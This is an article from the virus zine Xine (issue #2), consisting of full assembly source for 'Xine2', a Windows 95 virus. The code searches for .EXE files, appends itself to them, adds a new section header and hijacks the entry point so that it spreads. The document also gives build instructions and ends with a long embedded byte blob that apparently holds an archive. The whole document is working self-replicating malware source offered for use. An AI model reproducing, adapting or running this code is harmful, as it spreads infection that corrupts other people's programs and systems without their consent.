/-----------------------------\ | Xine - issue #2 - Phile 025 | \-----------------------------/ ; This virus was designed for Xine2 the second zine release for iKx ; sadly Xine2 may never be released. Another group dies with the first ; zine it releases ; Thanks to Murkry for some of the ideas ; like using the unused data area in the data segment ; and other invaluable ideas ;) ;cheers, ; jhb ; ; Compiling: ; ;tasm32 /ml /m3 Xine2,,; ;tlink32 /Tpe /aa /c Xine2,Xine2,, import32.lib ; ; Two assumations are made that will keep this virus within the win95 ; realm ; 1 Check for 400000h as the bas loading address ; 2 Check that some system dll is loaded at BFF70000H ; we hope its kernel32 ; ; The virus will attempt to return to the host if either is ; not true ; ; ;ok the object is to design this virus in chunks ; ; 1. ; Find a Quick way to locate the VxdCall 0 in the smallest possible ; way. ; Check if the list is in order then just goto or scan for ; the exports that have the firts 5 or so pointers into the ; same region ??? start at bff70000 area then scan upward ; Well this does not work, too many repeating bytes in the ; area but still using the Bff70000h start point its easy to ; find the Address table of the Exports which as it is in ordinal ; order we know the first one is (you guess it) VxDCall0 ;) ; ; 2 Next since we can be pretty sure this is win95 ; we scan from 400000h for the PE marker ; then locate the data size and where it should be ; since win95 use the 4096 as a page size the data ; segment will be in increments of 4096 (1000h) ; then check how big an area the host program actual uses ; if it has at least 600h bytes unused we then ; return with pointer to this area for virii to use as ; as a data R/W area. ; Well this works as long as there is only one data area ; if there is more then one then the calculations mess up ; so to remedy this one must search the Section headers for ; A R/W data area that has a dead space of 600 ; this is a little harder to do but should better assure us of ; a location that has free space ; Basic structure of the GetDataSpace ; 1 find the section entries ; 2 check flags for r/w ; test [header + 24h],0C0000000h ;flags = 0ffset 24h ; jz NotRW ; ;good one check it ; ;if if it as a big enough area for us ; mov eax,[header + 8h] ; sub eax,[header + 14h] ; cmp eax,600h ; jge SpaceOk ; jmp NotRW ; add eax,[header + 0ch] ; add eax,400000h ; ;typedef struct _WIN32_FIND_DATA { ; DWORD dwFileAttributes; 0 ; FILETIME ftCreationTime; DD ?,? 4 ; FILETIME ftLastAccessTime; DD ?,? C ; FILETIME ftLastWriteTime; DD ?,? 14 ; DWORD nFileSizeHigh; 1C ; DWORD nFileSizeLow; 20 ; DWORD dwReserved0; 24 ; DWORD dwReserved1; 28 ; CHAR cFileName[MAX_PATH]; 2C ; CHAR cAlternateFileName[ 0EH ]; 12bh ;} WIN32_FIND_DATA 139h .386 locals jumps .model flat ,stdcall ;Define the needed external functions and constants here. extrn ExitProcess:PROC extrn MessageBoxA:PROC ;note in the user32.dll ;---------------------------------------- K32 equ 0BFF70000H ;LOCATION OF THE KERNEL32 ;MODULE FOR WIN95 Viruslen equ (EndViri - offset HOST ) ;BELOW IS THE DATA AREA EQU FOR THE VIRUS ;ESI SHOULD POINT TO A START OF A MIN OF 400K R/W DATA AREA (I HOPE :> ) ; (Murk- If your wrong I am wasting my time!!! ) OrginIP equ 00h VxDCall equ 04h Counter equ 08h SrchHdle equ 0Ch FleHdle equ 010h Vsize equ 014h ;holds the VirtualSize of the virus PElocation equ 018h LocOfOldIP equ 01Ch ;where we will place the old ip OldIP equ 020h ;Area to hold it b4 we write it NewIP equ 024h SRCH EQU 0C0H ;length 139h I think ;) BUFFER equ 200H ;buffer for read write area ;--------------------------------------------------------------------- .data ;the data area storage dd 4 dup(0) .code ;executable code starts here HOST: ;first we check if this is a version of win95 that the virus's knows ; not a surefire test but if ; 1: EAX is = EIP on startup on start if this is true ; then eax upper word will in most cases be 0040 unless the first ; segemets take up more then (4095D * 255D) (1000*ff) which is ; unlikely at least now if it is we simply let the host take over. ; ; 2: Next we check within 200H bytes if there is a 'PE',00h ; once we find this we can find the data area and go from there ; again if we cant let the host take over ; ; 3: Lastly is there 2k free in the data segment to use if not ; let the host take over we might want to check the host ; before we infect it to avoid this chance. HOST: pushad push eax ;the IP of the virus ;here we are modifigng the store EAX in the stack so we can ;use it as a jump to return the host later ;warning this will crash horrible in a non Win95 setup mov edx,offset oldip - offset HOST add edx,eax ; mov eax,[edx] add eax,0400000h mov [esp + 20h],eax ;fix the eax be 4 so we can return ; to the host CALL GetDataSpace OR ESI,ESI ;check if we found enough memory JZ NotWinPopx ;for us to play with pop dword ptr [esi + OrginIP] ;store the start point ;here CAll GET_VXD OR ESI,ESI ;check if we found enough memory JnZ Win95 ;for us to play with ;ok we now have the address to the VxDcall ;so we can use the protected mode int21 ;also we know this is a version of win95 that I ; 1 Loads the modules in at 400000h ; 2 Some dll is loaded at bff7000h we hope its Kernel32 ;We otherwise would have failed in our tests or would have already ;caused some sorta Exception error NotWinPopx: pop eax NotWin95: jmp fini ;----------------------------------------------------------------- Win95: mov dword ptr ds:[ebp + Counter],0 ;INIT A COUNTER call FindFile mov [ebp + SrchHdle],ebx jnc FoundOne ;need find next routine ;ebx has the search file handle for next ;routine TryAgain: cmp dword ptr [ebp + Counter],4 ;have we search for max je NoFile ;yep get out call FindNext ;try to find another OR EAX,EAX ; JZ NoFile ;there is no other FoundOne: inc dword ptr [ebp + Counter] ;inc the counter CALL OpenFile ;try to open the file JC NOT_OPEN ;not opened jMP FileOpen ;open NOT_OPEN: cmp dword ptr [ebp + Counter],4 ;have we search for max je NoFile ;yep get out mov ebx,[ebp + SrchHdle] ;get the search handle jmp TryAgain ;try again FileOpen: MOV [ebp + FleHdle],EBX ;get the file handle MOV ECX,400H ;readin the CALL ReadFile ;header ;if we found a file we can read the file into the BUFFER location ;say 1k worth check if infect setup the new entry and ;if all it ok then we can write the virus to the end ;and then write the modified version to disk ;Find the PEheader start ;if not PE the get out MOV EAX,BUFFER + 3CH ;OFFSET TO THE HEADER ADD EAX,EBP mov ESI,dword ptr [EAX] ; ADD ESI,BUFFER CMP DWORD PTR [ESI+EBP],00004550H ;Check for PE00 je OkFile ;yay its one FileOpenError: call Close jmp TryAgain OkFile: ;ESI + EBP = THE LOCATION OF THE PE HEADER ;SO ADD ESI,EBP ;esi = PE header location push esi ;make sure its not infected mov eax,"niX." ;yet mov ecx,200h ; repne scasd ; pop esi je FileOpenError ; its infected ;ok we know the file is a PE and its not infected with Xine2 ; mov bl,02 ;get end of to file call MovePoint ; mov eax,dword ptr [esi + 28h] ;save the old ip mov dword ptr [ebp + OldIP],eax ; mov eax, Viruslen - 1 mov ecx, [esi + 3ch] ;file align is 3ch add eax,ecx ; xor edx,edx div ecx mul ecx push eax ;this is how much we are ;writing with the buffer ; pop ecx mov dword ptr[ebp + Vsize],ecx mov ecx, Viruslen ; ebx - handle ; ecx - number of bytes ; edx - the location of what we want to write mov edx,dword ptr [ebp + OrginIP] ;get the file handle call WriteFile ;write this to the end mov ecx,8 ;we want to write the mov edx,ebp ;old ip at the end of the add edx,OldIP ;virus call WriteFile ; mov edx,400400h mov ecx,dword ptr[ebp + Vsize] sub ecx,Viruslen + 8 call WriteFile ;ok if all is ok we need to add our section header ;and then update the rva starting point inc word ptr [esi + 6] ;section count 06 ;incrment it for us xor eax,eax mov ax,[esi + 6] mov [ebp + PElocation], esi ; save the pointer to the PE header dec eax mov ecx,28h ;section header size mul ecx add esi,eax ;location in header where we add esi,0f8h ;need to load the new section ;header ;f8 is the size of the pe header mov edi,esi ;edi = location in buffer ;toplace new header sub esi,28h ;pointer to ; the last old section header ;------------------- ;name of the section header ;------------------- mov eax,"niX." ;this stores the new header stosd ;name for us mov eax,"2e" ; stosd ; 8 bytes ;------------------- ;virtual size what did we write to the file with buffer ;------------------- mov eax,dword ptr[ebp + Vsize] ;sets the virtual stosd ;size of the header ;0ch ;------------------- ;Virtual address ;------------------- mov eax,[esi + 10h] ;get size of raw data from previous dec eax ; - 1 mov ebx,[ebp + PElocation] ;get the pointer to the PE header mov ecx,[ebx + 38h] ;get the section alignmnet add eax,ecx xor edx,edx div ecx mul ecx ;eax = the size of the last section ;Section aligmnet blocks add eax,[esi + 0ch] ;add in the Vaddress of the last ; section stosd ; 010h mov dword ptr [ebx + 28h],eax ;update the PEheader entry point add eax,dword ptr [ebx + 38h] ;update the size of the image file mov dword ptr [ebx + 50h],eax ;virii should not be bigger than ;4096 or this will not work ;------------------- ;size of raw data ;------------------- mov eax,[ebp + Vsize] ;the size of the raw data stosd ; 14h add dword ptr [ebx + 1ch],eax ;update ;size of code in pe header ;------------------- ;pointer to raw data ;------------------- mov eax,[ebp + SRCH + 20h] ; old size of file ;from the find data struc stosd ; 18 h bytes ;------------------- ;ptr to relocs size 4 ;------------------- push LARGE 0 pop eax stosd ;------------------- ;ptr to line nums size 4 ;------------------- stosd ;------------------- ;num relocs size 2 ;------------------- stosw ;------------------- ;num line no size 2 ;------------------- stosw ;------------------- ;Chararteristcs size 4 ; 6000 0020 excutable and readable code ;------------------- mov eax,60000020h stosd ; ;ok write the firts 400h bytes back to the start of the file xor bl,bl call MovePoint mov ecx,0400h mov edx, ebp add edx,BUFFER call WriteFile FileInfected: EFileOpen: ;file error ;need to close file and leave call Close NoFile: fini: popad jmp eax ;==================================================================== ;-------------------------------------------------------------- ;all below are the int 21 calls the code uses or code that would ;be used in a virus using this method ;------------------------------------------------------------- ;int 21 714eh ;cl = attributes mask ;ch = required mask ;si = time date format 0000h = 64 bit 0001h = msdos date time ;ds:dx = the file name we are looking for ;es:di = the place we want to fill with the found file ;done ;ax = file handle ;cx = uncode flag ;cf set on error ;ax= error code ;FILE equ 00400300h FNAME EQU 02CH SecHeader db 'Xine',0,0,0,0 ;8 byte header name HeaderFlags dd 60000000h ;Readable and Executable Fexe db '*.EXE',0 FindFile: mov eax,0000714eh mov edx,offset Fexe - offset HOST ;this will get us the *.exe add edx,[ebp + OrginIP] ; xor esi,esi inc esi push ds pop es mov Edi, ebp ;AREA TO SAVE THE FINDFILE INFO add edi, SRCH ; xor ecx,ecx Call INT_21 mov ebx,eax ret ;------------------------------------------------------------- ;ax = 714Fh ;ebx = file handle from previous search ;si = date time requested ;es:di buffer for findata ;note ebx = the search handle FindNext: mov ebx,[ebp + SrchHdle] mov eax,0000714fh mov esi,1 mov Edi, ebp add edi, SRCH call INT_21 ret ;------------------------------------------------------------- ; ; ebx = the file handle we want to close Close: mov eax,00003E00h MOV ebx, dword ptr [ebp + FleHdle] ;get the file handle call INT_21 ret ;------------------------------------------------------------- ; ecx:edx = the offset into the file ; al 0 = start of file ; 1 = current file ; 2 = end of file MovePoint: xor ecx,ecx mov edx,ecx MoveP: mov eax,00004200h mov al,bl MOV ebx, dword ptr [ebp + FleHdle] ;get the file handle call INT_21 ret ;------------------------------------------------------------- ;usual dos function here just need the filename from the search routine ;check cf for error OpenFile: mov eax,00003d02h mov EdX, ebp ADD Edx,SRCH + FNAME xor ecx,ecx call INT_21 mov EBX,eax ret ;------------------------------------------------------------- ;CreateFile: ; call c1 ;c1: ; pop eax ; ; xor ecx,ecx ; ; mov edx,offset Fake - offset c1 ; add eax,edx ; xchg eax,edx ;mov ds ; mov eax,00003c00h ; call INT_21 ; mov ebx,eax ; ret ;Fake db 'Murk$$',0 ; ; ;------------------------------------------------------------- ; ebx - handle ; ecx - number of bytes ; edx - the location of what we want to write WriteFile: mov eax,00004000h MOV ebx, dword ptr [ebp + FleHdle] ;get the file handle ;mov cx,number of bytes ;mov dx,the location of the data call INT_21 ret ;------------------------------------------------------------- ;ecx number of bytes ;edx = where we write the info to ReadFile: MOV EBX, [EBP+ FleHdle] mov eax, 00003f00h ;mov ecx,2 mov Edx,EBP ADD EDX,BUFFER call INT_21 ret ;------------------------------------------------------------- INT_21: push ecx push eax push 002a0010h call dword ptr [ebp + VxDCall] RET ;vxd0 dd 0bff713d4h ;this is the addresss for the ;vxdcall0 ;get_21 dd 002a0010h ;this is the 2a = Vwin32 10 = the int21 ;routine ;------------------------------------------------------------------------------------ ; onreturn will have ; ESI = the start of a 4k area of r\w data that the virus can use ; eax = the data location to use GetDataSpace: mov eax,00004550H ;check for PE00 mov edi, 00400000h repne scasd ; jne NotWin95A xchg edi,esi lodsw ; ok we are at header + 4 ; now we are at 6 lodsw ; ax = the number of sections ;peheader + 8 xor ecx,ecx ;get the number of sections mov ecx,eax ; add esi,0f8h - 8 ;get to the section header ; ;esi points to the first section header TryNext: cmp ecx,0 jz NotWin95A mov eax,[esi + 24h] ;flags and eax,0c0000000h cmp eax,0c0000000h jne NextOne mov eax,[esi + 8h] ;virtual size xor edx,edx mov ebx,4095 add eax,ebx inc ebx div ebx mul ebx sub eax,[esi + 10h] ;size of raw data cmp eax,600h jge OkSpace NextOne: add esi,28h loop TryNext OkSpace: mov eax,[esi + 0ch] ;virtual address add eax,[esi + 10h] ;size of raw data add eax,00400000h push eax pop esi ret NotWin95A: xor esi,esi ret ;end of GetDataSpace ;----------------------------------------------------------- ;----------------------------------------------------------- ;returns with the VxDcall fill with the correct location ;or again esi = 0 if failed ; GET_VXD: PUSH ESI ;SAVE OUR DATA AREA pop ebp XOR EAX,EAX MOV ESI,K32 + 3CH LODSW ;ESI = THE PE HEADER START of the Kernel32 ADD EAX,K32 CMP DWORD PTR [EAX],00004550H ;check for PE00 JE NoERROR ERROR: JMP NotWin95A ;ESI SHOULD HOLD THE POINTER TO THE ;RVA TO THE EXPORT DIRECTORY NoERROR: MOV ESI,[EAX + 78H] ; 78H = THE EXPORT RVA ADD ESI,K32 + 1CH ; 1CH RVA TO THE ADDRESS TABLE LODSD ; EAX IS ADD EAX,K32 ; FIRST OF THE ORDINAL ; EXPORTS PUSH EAX ;get this in the esi POP ESI ; LODSD ;gets the rva to the call ADD EAX,K32 ;EAX = THE VXDCALL IMPORT mov [ebp +VxDCall],eax ;save it in our data area RET ;end GetVxd ;----------------------------------------------------------- DB 80,75,3,4,20,0,0,0,8,0,242,170,119,32,167,184,152,155,109,25,0 DB 0,63,90,0,0,7,0,0,0,65,68,68,46,65,83,77,205,60,107,115,219,56 DB 146,223,93,229,255,208,179,181,85,147,76,148,172,36,59,153,140 DB 85,185,41,197,166,199,218,113,44,173,164,36,190,155,115,165,32 DB 18,146,24,83,132,150,15,75,158,171,251,239,135,110,0,36,64,82,178 DB 125,201,94,157,146,74,36,18,104,52,26,221,141,126,1,61,152,110 DB 4,176,52,205,87,44,11,69,156,2,75,56,172,88,192,33,91,178,12,54 DB 97,20,193,45,231,107,249,51,76,225,46,76,242,84,62,148,63,98,249 DB 132,203,175,241,47,175,15,15,122,144,112,22,173,240,139,250,116 DB 224,116,201,253,91,152,139,4,142,219,248,89,202,81,168,203,76,254 DB 31,9,22,132,241,2,88,16,36,60,77,203,126,93,221,143,6,79,197,138 DB 67,122,159,102,124,5,129,196,35,84,29,121,0,242,229,251,243,243 DB 159,17,238,69,217,89,126,54,28,150,98,205,33,204,82,137,118,18 DB 243,232,168,11,246,71,182,46,59,76,37,58,102,74,18,62,203,228,72 DB 235,12,50,33,167,147,229,73,140,223,16,229,165,72,51,8,231,192 DB 229,196,121,34,241,40,65,196,66,182,79,114,174,224,202,191,226 DB 150,186,136,217,87,238,103,136,178,132,17,240,52,92,196,54,9,195 DB 24,252,101,30,223,166,26,159,206,43,107,26,231,97,44,167,8,255 DB 200,67,255,22,54,236,30,65,68,194,103,25,39,208,159,182,193,41 DB 147,232,182,65,47,66,186,146,63,185,68,113,45,210,52,156,69,220 DB 130,37,187,219,160,65,211,87,78,6,123,70,97,74,56,74,64,34,9,228 DB 212,228,195,24,190,230,242,233,66,200,81,69,2,169,207,98,92,70 DB 7,8,246,229,219,181,72,178,84,45,213,146,221,41,228,230,33,62,123 DB 77,61,133,68,40,140,51,158,224,0,138,148,14,148,148,173,56,36,124 DB 17,138,24,126,253,245,87,72,51,150,100,184,182,179,249,156,214 DB 22,153,145,41,156,8,141,124,189,97,73,224,192,248,204,163,72,17 DB 54,16,60,165,229,216,136,228,182,5,153,16,176,98,241,189,28,96 DB 205,89,134,220,54,187,207,120,170,137,230,0,81,227,204,242,76,162 DB 128,140,144,167,216,28,167,243,94,99,178,212,200,209,132,136,187 DB 56,75,113,97,28,56,115,92,56,236,214,87,124,13,25,155,69,28,132 DB 34,182,167,9,182,89,134,62,73,67,104,209,62,140,89,228,192,82,235 DB 177,225,112,27,139,141,33,109,154,129,136,57,246,122,118,47,114 DB 88,228,56,72,152,61,135,79,219,51,228,137,54,244,158,59,28,222 DB 133,43,190,149,211,10,99,159,35,48,164,226,140,195,58,225,89,118 DB 15,105,158,112,69,188,48,45,69,217,22,38,181,250,137,88,21,82,140 DB 18,141,216,140,60,88,177,228,150,215,24,35,182,121,53,96,25,147 DB 163,255,201,129,197,129,156,57,79,80,54,33,93,138,60,10,36,38,46 DB 63,40,44,17,15,200,83,5,224,184,253,203,27,164,21,131,53,91,112 DB 5,202,0,118,59,243,197,138,199,90,99,201,41,134,177,252,235,39 DB 28,31,166,184,4,4,233,89,7,39,241,188,142,179,79,98,177,20,27,152 DB 133,11,137,108,193,122,74,248,215,137,88,36,108,5,204,207,114,134 DB 12,194,45,29,32,63,225,28,167,181,68,68,51,136,56,147,93,222,32 DB 181,52,207,229,177,236,17,32,65,113,48,167,167,214,52,168,83,141 DB 184,40,181,19,166,10,7,36,248,93,152,132,33,62,70,178,48,119,104 DB 34,14,209,121,252,183,207,212,197,17,248,82,64,80,46,82,32,237 DB 139,170,151,180,113,66,204,36,226,232,158,24,139,192,32,8,27,130 DB 210,21,170,229,74,36,106,14,212,156,190,32,141,124,22,249,121,164 DB 119,144,21,50,101,190,182,65,164,66,41,213,21,15,238,21,50,216 DB 125,133,122,38,229,44,241,151,4,101,194,125,132,0,75,206,2,84,26 DB 21,173,211,167,9,22,40,26,197,67,211,151,61,32,93,51,159,132,237 DB 77,187,109,247,51,12,206,32,10,179,44,226,178,143,210,117,2,2,161 DB 164,222,176,99,134,212,199,221,80,206,50,71,174,177,225,48,197 DB 216,136,97,49,244,60,225,92,13,108,183,124,207,210,208,135,52,75 DB 114,63,67,80,90,1,252,198,179,51,137,253,164,218,188,83,42,142 DB 84,147,128,199,89,18,186,60,214,213,60,58,143,216,130,104,3,201 DB 223,54,174,26,203,112,19,128,63,20,253,224,5,116,143,151,55,173 DB 246,105,187,173,101,151,62,61,5,224,29,180,231,243,148,103,216 DB 200,133,242,245,79,252,247,74,100,227,207,229,139,222,66,136,128 DB 86,77,97,17,102,214,59,228,126,18,0,90,12,20,32,30,139,124,177 DB 44,25,56,119,121,22,86,226,78,254,203,217,182,85,98,251,118,121 DB 3,110,171,52,159,213,90,117,228,156,220,86,254,106,173,91,161,200 DB 85,230,178,224,242,95,162,248,240,182,242,138,186,85,166,73,235 DB 28,4,181,81,219,126,117,212,178,149,214,140,164,119,229,63,217 DB 253,154,7,124,174,151,31,190,124,30,92,29,117,191,156,15,174,206 DB 190,156,245,167,125,248,47,5,231,236,243,112,124,6,193,230,60,140 DB 120,63,203,146,112,150,103,60,181,71,168,124,52,79,159,15,46,189 DB 233,224,131,7,243,236,52,225,196,142,211,112,197,157,142,103,103 DB 240,107,235,87,253,227,184,214,239,146,165,89,223,247,121,154,86 DB 122,58,253,78,27,251,125,78,194,140,87,7,116,250,117,142,237,9 DB 198,56,191,73,248,39,191,8,23,203,61,179,195,142,167,141,29,47 DB 197,102,127,63,232,182,93,146,142,121,202,147,59,30,180,31,232 DB 7,93,7,213,178,99,231,193,142,111,85,199,211,139,254,24,124,196 DB 244,138,173,248,31,31,250,215,95,70,253,233,197,205,206,254,221 DB 83,187,99,63,202,120,18,179,140,23,16,160,237,93,64,83,247,78,119 DB 134,28,246,223,80,101,167,135,63,157,163,95,150,200,153,135,7,175 DB 142,222,190,57,60,64,45,22,165,135,7,95,243,213,90,254,247,106 DB 37,2,30,161,90,201,160,149,102,129,124,137,150,200,25,159,135,74 DB 197,67,204,57,26,221,124,75,216,202,166,121,236,107,103,33,14,192 DB 151,95,50,134,155,44,110,18,175,112,28,217,50,137,45,12,188,109 DB 152,141,18,129,28,119,50,26,15,79,235,45,62,200,87,108,193,223 DB 139,109,159,90,84,231,208,139,69,198,141,189,155,167,60,57,234 DB 190,10,16,79,212,24,47,31,249,57,60,248,189,226,13,240,127,230 DB 74,182,10,111,162,28,241,114,120,218,159,14,134,87,48,60,135,233 DB 133,7,191,123,227,43,239,242,168,43,199,124,252,167,247,97,120 DB 246,241,210,131,243,225,24,87,14,13,172,79,232,0,68,60,174,226 DB 240,204,139,3,249,46,132,151,32,148,102,190,24,78,166,0,207,129 DB 212,202,123,239,114,248,25,6,19,194,133,86,190,63,246,250,224,253 DB 227,35,1,199,167,159,6,227,143,19,217,212,155,12,96,114,49,252 DB 120,121,6,163,225,224,106,10,211,33,244,1,38,211,254,120,138,179 DB 233,195,135,1,77,235,184,221,254,157,54,213,18,222,179,129,28,118 DB 228,193,201,191,1,89,73,207,62,228,201,237,75,24,204,225,94,228 DB 9,108,18,180,29,6,192,86,176,97,41,89,213,171,123,200,194,21,255 DB 225,135,31,176,199,225,193,48,89,132,241,96,84,163,49,144,142,212 DB 134,106,195,91,220,134,78,69,78,6,80,253,237,91,249,118,146,248 DB 203,139,32,226,245,183,167,242,237,121,196,237,151,214,219,14,13 DB 76,166,99,125,233,229,235,227,165,245,28,122,75,17,5,202,85,253 DB 20,38,104,238,161,22,50,123,56,185,111,135,7,35,175,176,5,170,208 DB 16,211,75,225,15,231,195,40,48,100,176,94,159,218,131,245,148,69 DB 188,225,202,108,93,71,104,193,144,251,24,5,16,174,15,15,44,24,21 DB 64,221,182,3,168,79,22,145,128,37,245,204,96,118,76,80,81,91,227 DB 207,195,131,43,190,217,5,201,157,127,237,115,120,48,25,159,94,216 DB 79,144,233,20,221,45,129,65,44,34,30,47,178,37,105,28,24,160,225 DB 21,223,146,71,114,120,240,254,227,249,185,55,174,15,223,181,101 DB 14,65,204,242,249,28,57,128,12,28,52,235,212,28,148,81,250,4,97 DB 127,64,19,144,80,189,34,99,242,145,159,94,225,207,40,92,210,76 DB 36,108,81,178,20,217,3,184,223,66,144,175,159,181,159,187,36,148 DB 131,249,34,176,25,112,231,56,124,203,253,92,121,142,212,133,60 DB 79,165,93,17,14,106,133,19,34,133,114,8,55,133,73,54,183,76,221 DB 59,158,164,200,157,98,174,29,42,50,89,11,14,254,49,37,191,146,172 DB 50,244,153,25,249,130,18,32,87,70,36,90,197,33,89,191,157,19,240 DB 250,215,8,244,29,120,131,17,72,152,132,80,190,46,190,218,35,235 DB 88,136,237,90,113,182,5,200,215,107,116,103,69,18,40,86,15,99,88 DB 161,99,229,179,148,167,232,175,181,219,199,109,200,227,136,220 DB 102,227,237,150,144,82,190,224,43,142,225,6,118,203,37,52,203,19 DB 121,118,220,254,229,245,25,252,4,221,215,175,207,158,43,23,239 DB 167,249,252,185,118,180,237,104,141,132,31,222,242,232,190,244 DB 210,208,185,86,182,43,122,72,232,96,174,214,242,125,196,179,210 DB 249,163,33,197,29,79,94,105,223,186,123,162,220,234,130,244,58 DB 34,70,204,172,163,12,150,211,196,224,199,145,247,99,203,49,78,133 DB 118,200,181,229,175,6,39,103,219,184,2,165,163,131,187,236,66,40 DB 55,60,83,108,96,192,176,5,67,71,119,174,123,103,59,16,2